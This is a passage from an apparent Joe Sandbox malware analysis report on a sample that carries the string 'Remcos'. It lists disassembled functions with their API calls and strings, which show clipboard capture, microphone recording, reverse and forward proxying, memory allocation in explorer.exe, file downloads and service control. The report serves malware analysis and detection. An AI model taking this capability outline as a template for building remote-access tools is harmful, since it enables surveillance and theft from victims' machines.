DispatchMessageA.USER32 ref: 00405589
HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405679

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

Strings

DisplayMessage, xrefs: 004055EC
GetMessage, xrefs: 004055F8
CloseChat, xrefs: 00405609

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
String ID: CloseChat$DisplayMessage$GetMessage
API String ID: 2956720200-749203953
Opcode ID: 86fea375002ccb003de664864008f382d6ba5836bfb0b35838b0b24901e3f6df
Instruction ID: fac30f2e37e154151ba5f09932d78796b5672d7f7f1631b14e77a4da00ed4c1d
Opcode Fuzzy Hash: 86fea375002ccb003de664864008f382d6ba5836bfb0b35838b0b24901e3f6df
Instruction Fuzzy Hash: 7541B271604301ABCB14FB75DC5A86F37A9AB85744F40093EF916A36E1EF3C8905CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00417C2D Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 108filesynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 00417E7A: __EH_prolog.LIBCMT ref: 00417E7F

WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660A4), ref: 00417D2A
CloseHandle.KERNEL32(00000000), ref: 00417D33
DeleteFileA.KERNEL32(00000000), ref: 00417D42
ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417CF6

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

Strings

Temp, xrefs: 00417C4E
0VG, xrefs: 00417D03
0VG, xrefs: 00417D6F
@, xrefs: 00417CD8
<, xrefs: 00417CD1

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
String ID: 0VG$0VG$<$@$Temp
API String ID: 1704390241-2575729100
Opcode ID: 884926dbc2f4342c3e31fd48ea0137ae5da3e9f8417a43bc9c6e092cb74613ae
Instruction ID: 743bab563fa925c91e9bd11877dc29bb9b78fb67e5c7396ab49355918e86c52c
Opcode Fuzzy Hash: 884926dbc2f4342c3e31fd48ea0137ae5da3e9f8417a43bc9c6e092cb74613ae
Instruction Fuzzy Hash: 53415C319002099ACB14FB62DC56AFE7775AF10308F5041BEF506761E2EF7D1A8ACB99

Uniqueness

Uniqueness Score: -1.00%

Function 0041688E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 46clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 0041688F
EmptyClipboard.USER32 ref: 0041689D
CloseClipboard.USER32 ref: 004168A3
OpenClipboard.USER32 ref: 004168AA
GetClipboardData.USER32 ref: 004168BA
GlobalLock.KERNEL32 ref: 004168C3
GlobalUnlock.KERNEL32(00000000), ref: 004168CC
CloseClipboard.USER32 ref: 004168D2

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

Strings

!D@, xrefs: 00416FD7

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
String ID: !D@
API String ID: 2172192267-604454484
Opcode ID: da6010ac61b110ab4bf06f7ba957bd9646f5f8c854801cc467739b1a1e98d4e3
Instruction ID: 129740f40504877be21c885bea0291386d0f791e208c218662832cd19edc281c
Opcode Fuzzy Hash: da6010ac61b110ab4bf06f7ba957bd9646f5f8c854801cc467739b1a1e98d4e3
Instruction Fuzzy Hash: CA012971204300DBC714AB72AC59AAE77A5AF84742F40047EF94A961E2EF38CC45CA69

Uniqueness

Uniqueness Score: -1.00%

Function 00CB7063 Relevance: 15.3, APIs: 10, Instructions: 289networkfileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00CB70B6
InternetOpenA.WININET(00CDFE4B,00000000,00000000,00000000,00000000), ref: 00CB70CC
InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00CB70EC
InternetReadFile.WININET(00000000,00000000,00004000,00004000), ref: 00CB70FD
WriteFile.KERNEL32(?,00000000,00004000,?,00000000), ref: 00CB7122
InternetReadFile.WININET(00000000,00000000,00004000,00004000), ref: 00CB712D
CloseHandle.KERNEL32(?), ref: 00CB713F
InternetCloseHandle.WININET(?), ref: 00CB714E
InternetCloseHandle.WININET(00000000), ref: 00CB7151
RemoveDirectoryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00CB7303

Memory Dump Source

Source File: 00000002.00000002.1399136242.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000002.00000002.1399130212.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399143689.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399149844.0000000000CE3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399155708.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399162146.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: Internet$File$CloseHandle$OpenRead$CreateDirectoryRemoveWrite
String ID:
API String ID: 1496009958-0
Opcode ID: fa5b74e47455d10b6c4afef16b7ab0a5913a211699b6e4db50dcc70505ef00de
Instruction ID: 77dfc9cd9f57dda0a11b7278badc859bdec08c77ab1f37ecd745a1463b1049ab
Opcode Fuzzy Hash: fa5b74e47455d10b6c4afef16b7ab0a5913a211699b6e4db50dcc70505ef00de
Instruction Fuzzy Hash: F1A1AC71A00208ABEB18CFA4DC85FED77B5AB89304F20421DFD55A72E1D735EA819B61

Uniqueness

Uniqueness Score: -1.00%

Function 00413220 Relevance: 15.2, APIs: 10, Instructions: 153fileCOMMON

Download Yara Rule

APIs

CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413365
MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413373
GetFileSize.KERNEL32(?,00000000), ref: 00413380
UnmapViewOfFile.KERNEL32(00000000), ref: 004133A0
CloseHandle.KERNEL32(00000000), ref: 004133AD
CloseHandle.KERNEL32(?), ref: 004133B3

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: File$CloseHandleView$CreateMappingSizeUnmap
String ID:
API String ID: 297527592-0
Opcode ID: 54d0a7ceb6156b179c4d4b70ecf7ac426438401b13d8ed2bf61df12e179022dc
Instruction ID: 5c5bf2d68fde417aed129774ee901704837dfcc31a9725c6dfb724aa407e88ba
Opcode Fuzzy Hash: 54d0a7ceb6156b179c4d4b70ecf7ac426438401b13d8ed2bf61df12e179022dc
Instruction Fuzzy Hash: 9B41E631104305BBE720AF65DC4AFAB7BACEF89725F10052EF655D1191DB38DA40C66E

Uniqueness

Uniqueness Score: -1.00%

Function 00CC912A Relevance: 15.1, APIs: 10, Instructions: 69COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00CC9140

Part of subcall function 00CC8951: HeapFree.KERNEL32(00000000,00000000,?,00CC7A83), ref: 00CC8967
Part of subcall function 00CC8951: GetLastError.KERNEL32(?,?,00CC7A83), ref: 00CC8979

_free.LIBCMT ref: 00CC914C
_free.LIBCMT ref: 00CC9157
_free.LIBCMT ref: 00CC9162
_free.LIBCMT ref: 00CC916D
_free.LIBCMT ref: 00CC9178
_free.LIBCMT ref: 00CC9183
_free.LIBCMT ref: 00CC918E
_free.LIBCMT ref: 00CC9199
_free.LIBCMT ref: 00CC91A7

Memory Dump Source

Source File: 00000002.00000002.1399136242.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000002.00000002.1399130212.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399143689.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399149844.0000000000CE3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399155708.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399162146.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 9c6d7bb66b4b8a31ef1751ec185bb79328e650d91c8168b94c70f2f3d7daf3f8
Instruction ID: 1595a64828e0de5bea215e236ccc12a1f524a7be4050d2f9327b5a4038e3a527
Opcode Fuzzy Hash: 9c6d7bb66b4b8a31ef1751ec185bb79328e650d91c8168b94c70f2f3d7daf3f8
Instruction Fuzzy Hash: D321FC76904109BFCB01EF94C895EDE7BB9FF08340F00466AF9199B161DB31DA48DB81

Uniqueness

Uniqueness Score: -1.00%

Function 0041AA5B Relevance: 15.1, APIs: 10, Instructions: 66serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A3D4,00000000), ref: 0041AA6A
OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A3D4,00000000), ref: 0041AA81
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A3D4,00000000), ref: 0041AA8E
ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A3D4,00000000), ref: 0041AA9D
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A3D4,00000000), ref: 0041AAAE
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A3D4,00000000), ref: 0041AAB1

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID:
API String ID: 221034970-0
Opcode ID: a617342fd7d0ab3f36a6b4bf1726268dedbc23e606f349c661561497bbda8e31
Instruction ID: c2f3bd219c20ba15e3fc912c542e610d52f6c467f259bd4982bc279ce16e436d
Opcode Fuzzy Hash: a617342fd7d0ab3f36a6b4bf1726268dedbc23e606f349c661561497bbda8e31
Instruction Fuzzy Hash: E211A931941318AFD711AF64DC85DFF3B6CDF45BA6B000026F90592191DB688D46EABA

Uniqueness

Uniqueness Score: -1.00%

Function 00447FE1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00447FF5

Part of subcall function 00446642: RtlFreeHeap.NTDLL(00000000,00000000,?,00450BB0,?,00000000,?,00000000,?,00450E54,?,00000007,?,?,0045139F,?), ref: 00446658
Part of subcall function 00446642: GetLastError.KERNEL32(?,?,00450BB0,?,00000000,?,00000000,?,00450E54,?,00000007,?,?,0045139F,?,?), ref: 0044666A

_free.LIBCMT ref: 00448001
_free.LIBCMT ref: 0044800C
_free.LIBCMT ref: 00448017
_free.LIBCMT ref: 00448022
_free.LIBCMT ref: 0044802D
_free.LIBCMT ref: 00448038
_free.LIBCMT ref: 00448043
_free.LIBCMT ref: 0044804E
_free.LIBCMT ref: 0044805C

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 6e582879fdb95b5eb241110b1c4896f2dbd4dfc0d6566bb9b95a81e2e81fb98c
Instruction ID: a35366ba27863770f41d020e2d809a06ff37228c29ccb260fdbf0525f8878b4a
Opcode Fuzzy Hash: 6e582879fdb95b5eb241110b1c4896f2dbd4dfc0d6566bb9b95a81e2e81fb98c
Instruction Fuzzy Hash: FD11B676500108BFDB01EF96C852CD93BA9FF05354B6241AAFE488F226DB35DE509B8D

Uniqueness

Uniqueness Score: -1.00%

Function 00411443 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 191COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?), ref: 00411462
inet_ntoa.WS2_32(?), ref: 004114FD

Strings

StopReverse, xrefs: 004115EF
StartReverse, xrefs: 004115CD
StopForward, xrefs: 004115DE
NG, xrefs: 00411488
StartForward, xrefs: 004115C1
GetDirectListeningPort, xrefs: 00411600

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: Eventinet_ntoa
String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
API String ID: 3578746661-3604713145
Opcode ID: 521bfc0f23ccb7f0c574cf55f4fedddf81fc9d69e4144a6dc2418c24e37844c8
Instruction ID: eff6fc71ce925c47b380800239c389c467092b4a5c3464dac972748da0f26b71
Opcode Fuzzy Hash: 521bfc0f23ccb7f0c574cf55f4fedddf81fc9d69e4144a6dc2418c24e37844c8
Instruction Fuzzy Hash: 3451B531A042015BC614FB36C91AAAE36A5AB84344F40453FF906A76F1EFBD8D85C7CE

Uniqueness

Uniqueness Score: -1.00%

Function 00455E45 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00456F3F), ref: 00455E68

Strings

log10, xrefs: 00455EB2, 00455F02
exp, xrefs: 00455F2D, 00455F8F
asin, xrefs: 00455FD4
acos, xrefs: 00455FE0
sqrt, xrefs: 00455FEC
pow, xrefs: 00455F4C, 00455FF8, 0045600B
log, xrefs: 00455F0E, 00455F1A

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: DecodePointer
String ID: acos$asin$exp$log$log10$pow$sqrt
API String ID: 3527080286-3064271455
Opcode ID: 6fe1295bdd25f4f1a78ee600a9a1b2496a6a8165ae1eb54d48c2b7636e0dbce5
Instruction ID: 0f57c59634fb7a4e7797d35698a15f7e89d6327b6ac9b7ea032057c8322c8714
Opcode Fuzzy Hash: 6fe1295bdd25f4f1a78ee600a9a1b2496a6a8165ae1eb54d48c2b7636e0dbce5
Instruction Fuzzy Hash: 2B517D7190090ACBCF10DF58E9581BEBBB0FB49306F614197D841A7396CB798E298B1E

Uniqueness

Uniqueness Score: -1.00%

Function 004173E3 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 104sleepfileCOMMON

Download Yara Rule

APIs

ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00417443

Part of subcall function 0041C3D3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A791), ref: 0041C3EC

Sleep.KERNEL32(00000064), ref: 0041746F
DeleteFileW.KERNEL32(00000000), ref: 004174A3

Strings

\sysinfo.txt, xrefs: 004173EE
open, xrefs: 0041743D
dxdiag, xrefs: 00417438
temp, xrefs: 004173F3
/t , xrefs: 00417422

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: File$CreateDeleteExecuteShellSleep
String ID: /t $\sysinfo.txt$dxdiag$open$temp
API String ID: 1462127192-2001430897
Opcode ID: 4b40f5b2e34b38d6b4d2e34401560a98a04eebcb988fdd9fb552673f62673dcd
Instruction ID: 08e178d58cb94228c3422c156c5c16405d07e5ed2aae09261949ad67490c1d9a
Opcode Fuzzy Hash: 4b40f5b2e34b38d6b4d2e34401560a98a04eebcb988fdd9fb552673f62673dcd
Instruction Fuzzy Hash: D5313F7194011A9ADB04FBA1DC96DED7775AF10309F40017EF506720E2EF785A8ACA9C

Uniqueness

Uniqueness Score: -1.00%

Function 004073AC Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 99COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00472B14,00000000,004752D8,00003000,00000004,00000000,00000001), ref: 004073DD
GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407656,C:\Users\user\Desktop\yaALNupJCH.exe), ref: 0040749E

Strings

[+] NtAllocateVirtualMemory Success, xrefs: 00407410
PEB: %x, xrefs: 004074AF
windir, xrefs: 004073EA
explorer.exe, xrefs: 00407450, 0040747B
[-] NtAllocateVirtualMemory Error, xrefs: 0040743D
\explorer.exe, xrefs: 00407400

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: CurrentProcess
String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
API String ID: 2050909247-4242073005
Opcode ID: 1d7fef670ac32d1458b7b125a0323f10745753faa8a49cf3701c3c420fcf5eae
Instruction ID: bc6dbff0aa7a72516d7c70bfac6cc66ded9047052da24c13ef57668a4d7cd7d0
Opcode Fuzzy Hash: 1d7fef670ac32d1458b7b125a0323f10745753faa8a49cf3701c3c420fcf5eae
Instruction Fuzzy Hash: 1C31A571A04700ABD321FF65ED46F167BB8AB44305F10087EF515A6292E7B8F8448B6F

Uniqueness

Uniqueness Score: -1.00%

Function 00401D0B Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 89COMMON

Download Yara Rule

APIs

_strftime.LIBCMT ref: 00401D50

Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9

waveInUnprepareHeader.WINMM(00472A88,00000020,00000000,?), ref: 00401E02
waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F

Strings

dMG, xrefs: 00401D81
.wav, xrefs: 00401D69
|MG, xrefs: 00401E08
%Y-%m-%d %H.%M, xrefs: 00401D41

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
API String ID: 3809562944-243156785
Opcode ID: 5440b7f27a0b7c684a07a1fe7e947bc3438ad6ee44469cc2b6da6e6cae1fdd43
Instruction ID: 86e44ae8bedd0ebf4347f5aedf48d4a89b3e0c101edbf811c5c3d30ebe35e1e4
Opcode Fuzzy Hash: 5440b7f27a0b7c684a07a1fe7e947bc3438ad6ee44469cc2b6da6e6cae1fdd43
Instruction Fuzzy Hash: 793161315043019FC325EB61DD56A9A77A8EB94314F40443EF18DA21F2EFB89A49CB5E

Uniqueness

Uniqueness Score: -1.00%

Function 00401BE9 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 71COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000,00000024), ref: 00401C8F
waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
waveInStart.WINMM ref: 00401CFE

Strings

PG, xrefs: 00401C27
|MG, xrefs: 00401C9B
dMG, xrefs: 00401BED

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
String ID: dMG$|MG$PG
API String ID: 1356121797-532278878
Opcode ID: c221aea4fce1c3107db83a77f38fb06dabf39ae871bf7de157c09f86457ff83c
Instruction ID: 20befe2c3b3cf13b08393a25abd1b36ed57efd15c64c44280ed0b29356de7c79
Opcode Fuzzy Hash: c221aea4fce1c3107db83a77f38fb06dabf39ae871bf7de157c09f86457ff83c
Instruction Fuzzy Hash: 15213971604201AFC7399F66EE05A6A7BB6EB84715B00803EA10DD76B1DBB84881CB1C

Uniqueness

Uniqueness Score: -1.00%

Function 0041D3AB Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 48windowstringCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D3C4

Part of subcall function 0041D45D: RegisterClassExA.USER32(00000030), ref: 0041D4A9
Part of subcall function 0041D45D: CreateWindowExA.USER32 ref: 0041D4C4
Part of subcall function 0041D45D: GetLastError.KERNEL32 ref: 0041D4CE

ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D3FB
lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D415
Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D42B
TranslateMessage.USER32(?), ref: 0041D437
DispatchMessageA.USER32 ref: 0041D441
GetMessageA.USER32 ref: 0041D44E

Strings

Remcos, xrefs: 0041D406

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
String ID: Remcos
API String ID: 1970332568-165870891
Opcode ID: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
Instruction ID: e282ba57f5f7090582ef61bd5218c64c1a6e96440b5edf8ca63e0eac7fc3bbf0
Opcode Fuzzy Hash: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
Instruction Fuzzy Hash: 7B015271800345EBD7109FA5EC4CFEABB7CEB85705F00402AF515931A1D778E885CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00CD2FA2 Relevance: 13.8, APIs: 9, Instructions: 301COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1399136242.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000002.00000002.1399130212.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399143689.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399149844.0000000000CE3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399155708.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1399162146.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_cb0000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff817641d775207c8839d634c11e4697690ebb15b5d21cf5091a0013dcfa5c30
Instruction ID: 68c5a07d159de0082b44928ad34cdc6002ce69b499563f06be8c90fc61f22854
Opcode Fuzzy Hash: ff817641d775207c8839d634c11e4697690ebb15b5d21cf5091a0013dcfa5c30
Instruction Fuzzy Hash: 64C1F771E04285EFDB15DF99C881BAD7BB0BF49310F04419AE6519B393C774AB42CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0044CC40 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: deedb161f42dead65039297b344bbc88d7a973a326667ab2a5eb92d126fd70dc
Instruction ID: bc9101534197174687616f3321db5155530f9d2df3e04a4d6add1b90fa5dd2ef
Opcode Fuzzy Hash: deedb161f42dead65039297b344bbc88d7a973a326667ab2a5eb92d126fd70dc
Instruction Fuzzy Hash: 52C14970D05249AFEF51DFA9C881BAEBBB1EF09300F18415AE914A7392C73C8D45CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00453CC4 Relevance: 13.8, APIs: 9, Instructions: 268COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,00453F9D,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00453D70
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,00453F9D,00000000,00000000,?,00000001,?,?,?,?), ref: 00453DF3
__alloca_probe_16.LIBCMT ref: 00453E2B
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,00453F9D,?,00453F9D,00000000,00000000,?,00000001,?,?,?,?), ref: 00453E86
__alloca_probe_16.LIBCMT ref: 00453ED5
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00453F9D,00000000,00000000,?,00000001,?,?,?,?), ref: 00453E9D

Part of subcall function 00446077: RtlAllocateHeap.NTDLL(00000000,004351DF,?,?,00438787,?,?,00000000,?,?,0040DDB0,004351DF,?,?,?,?), ref: 004460A9

MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00453F9D,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F19
__freea.LIBCMT ref: 00453F44
__freea.LIBCMT ref: 00453F50

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
String ID:
API String ID: 201697637-0
Opcode ID: 88c37d39953354d41b678b337c6746aface65072aedf168112e6b1f7eaf8fd59
Instruction ID: c41b4ac32cf2e64be7c3f772a3bd9f8c5d61163beb175bcb63f9ab3c35cfe47a
Opcode Fuzzy Hash: 88c37d39953354d41b678b337c6746aface65072aedf168112e6b1f7eaf8fd59
Instruction Fuzzy Hash: 5E91E372E00216AADF218E65C841AEFBBB59F09787F14415BEC05E7282D73DDE48C768

Uniqueness

Uniqueness Score: -1.00%

Function 004450B9 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 004480D5: GetLastError.KERNEL32(00000020,?,0043A735,?,?,?,0043F8E8,?,?,00000020,00000000,?,?,?,0042DC4F,0000003B), ref: 004480D9
Part of subcall function 004480D5: _free.LIBCMT ref: 0044810C
Part of subcall function 004480D5: SetLastError.KERNEL32(00000000,0043F8E8,?,?,00000020,00000000,?,?,?,0042DC4F,0000003B,?,00000041,00000000,00000000), ref: 0044814D
Part of subcall function 004480D5: _abort.LIBCMT ref: 00448153

_memcmp.LIBVCRUNTIME ref: 00445363
_free.LIBCMT ref: 004453D4
_free.LIBCMT ref: 004453ED
_free.LIBCMT ref: 0044541F
_free.LIBCMT ref: 00445428
_free.LIBCMT ref: 00445434

Strings

C, xrefs: 00445221

Memory Dump Source

Source File: 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_yaALNupJCH.jbxd

Yara matches

Similarity

API ID: _free$ErrorLast$_abort_memcmp
String ID: C
API String ID: 1679612858-1037565863
Opcode ID: 3d650270663409eeb647b975663f0b35679f9515e52849003da4b768d4d896b6
Instruction ID: b193eef1824d512bc11d0bb5b1df730bd52d5cef41945038379268ca97d1a664
Opcode Fuzzy Hash: 3d650270663409eeb647b975663f0b35679f9515e52849003da4b768d4d896b6
